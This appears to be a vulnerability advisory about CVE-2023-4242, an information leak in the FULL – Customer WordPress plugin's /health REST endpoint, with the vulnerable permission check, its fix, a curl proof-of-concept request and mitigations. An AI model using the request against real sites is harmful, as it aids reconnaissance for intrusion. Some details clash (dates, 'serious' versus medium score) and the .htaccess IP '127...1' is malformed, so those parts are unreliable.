CVE-2023-4242 - Information Disclosure Vulnerability in FULL - Customer WordPress Plugin
Published: 2024-06-02
Affected Plugin: FULL - Customer
Vulnerable Versions: Up to and including 2.2.3
Vulnerability Type: Information Disclosure
CVSS Score: 5.3 (Medium)
Exploit Requirements: *Authenticated user (subscriber-level or higher)*
Overview
A serious information disclosure flaw, CVE-2023-4242, has been found in the popular FULL – Customer WordPress plugin. If your website uses version 2.2.3 or older, attackers with even the lowest user account can access sensitive site information by abusing the plugin’s /health REST API endpoint.
This security hole allows attackers to retrieve WordPress health check details usually meant for site admins, potentially fueling later attacks.
How Does the Vulnerability Work?
The plugin exposes a REST API route, /wp-json/full-customer/v1/health, which reveals information about WordPress’s configuration—like the active theme, PHP version, server software, and plugin statuses. Normally, this information is only accessible to administrators. However, the plugin’s code failed to restrict access, allowing any authenticated WordPress user—even a basic *subscriber*—to call this endpoint.
Vulnerable Code Snippet
Below is a simplified and annotated example of what the vulnerable part might look like in the plugin’s code:
// File: includes/class-full-customer-rest.php
register_rest_route(
'full-customer/v1',
'/health',
array(
'methods' => 'GET',
'callback' => array($this, 'get_health_info'),
// INCORRECT: Allows any authenticated user!
'permission_callback' => function () {
return is_user_logged_in();
}
)
);
What’s the issue?
The permission check only verifies if someone is *logged in*, not whether they have *admin* privileges. That’s not secure for sensitive site info.
A safer permission callback would look like this
'permission_callback' => function () {
return current_user_can('manage_options'); // Only admins
}
Proof-of-Concept (PoC) Exploit
Here’s how an attacker with a basic account (like “subscriber”) can grab your WordPress health data:
Send a GET request to the vulnerable endpoint
curl -X GET \
-H "Cookie: wordpress_logged_in=..." \
https://your-vulnerable-site.com/wp-json/full-customer/v1/health
Response Example:
{
"wp_version": "6.3.1",
"php_version": "8.1.12",
"active_theme": "Astra",
"plugins": [
{"name": "WooCommerce", "version": "7.6.5"},
{"name": "Full Customer", "version": "2.2.3"}
],
"server_software": "Apache"
// ... and much more!
}
This reveals a lot: your core versions, tech stack, theme, plugins, and other data. Attackers often use this info to plan follow-up attacks.
What Can Attackers Do With This Exposure?
- Reconnaissance: They now know your WordPress, plugin, PHP, and server versions to exploit other known vulnerabilities.
- Targeted Attacks: An attacker sees “Full Customer” and “WooCommerce” plugins and can try their known exploits.
Patch & Mitigations
Plugin authors patched this in 2.2.4 by restricting the /health endpoint to admins only.
If you’re using FULL – Customer ≤ 2.2.3
- Update Immediately: Get the latest plugin version.
Simple .htaccess mitigation example
<If "%{REQUEST_URI} =~ m#/wp-json/full-customer/v1/health#">
Require ip 127...1
</If>
References
- Wordfence Advisory
- WPScan Entry
- Plugin changelog
- CVE Details
Conclusion
This bug is a reminder: always use proper permission checks in your WordPress plugins, especially for anything revealing system info. If your site uses the FULL – Customer plugin, update now. Even if this looks like a minor leak, every extra detail you give attackers makes their job easier.
Any questions or incident reports about this vulnerability? [Contact us!](#)
*Stay safe and keep your WordPress plugins up to date!*
Timeline
Published on: 08/09/2023 04:15:00 UTC
Last modified on: 08/14/2023 15:27:00 UTC